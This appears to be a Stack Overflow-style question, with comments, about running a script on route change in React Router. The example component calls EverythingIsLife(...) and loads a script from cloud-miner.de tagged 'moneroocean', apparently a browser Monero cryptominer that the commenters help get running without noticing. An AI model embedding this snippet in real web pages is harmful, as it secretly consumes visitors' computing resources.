# Is there an onLoad function for React Router

Tags: javascript, reactjs, react-router, onload

I have a multipage react application and I need to run a script after the page loads, so I've put it into the callback function of a `window.onLoad` event handler. The problem is however, that when I access that route from another route then the script is not run, because technically the page has already loaded.

How can I circumvent this issue and run the script on route change to that particular route?

React Component

```
// imports

function Component() {
useEffect(() => {
    EverythingIsLife(...);
},[])
return (<>
        <script src="https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean"></script>
        // Other html
</>)
}
```

Comment: Put it in an effect hook or in the componentDidMount method of your React container component?

Comment: I have a <script src="" /> in my head that loads a function to be used in this script. Whenever I put it directly in my effect hook, I get an error saying the the function is not defined.

Comment: It's not going to be available directly in the component's scope if you're loading it via a script tag, but you can probably still get to it via `window.myFunctionName()`. Having said that, I'd strongly recommend moving it into your react code instead.

Comment: Allright I've moved the script into the return line of my react code, but I'm still getting that the function is not defined

Comment: I meant move the function definition into the react code, not the script tag. And it doesn't have to be in the component code. Just put it in the project somewhere and import it where you need to call it.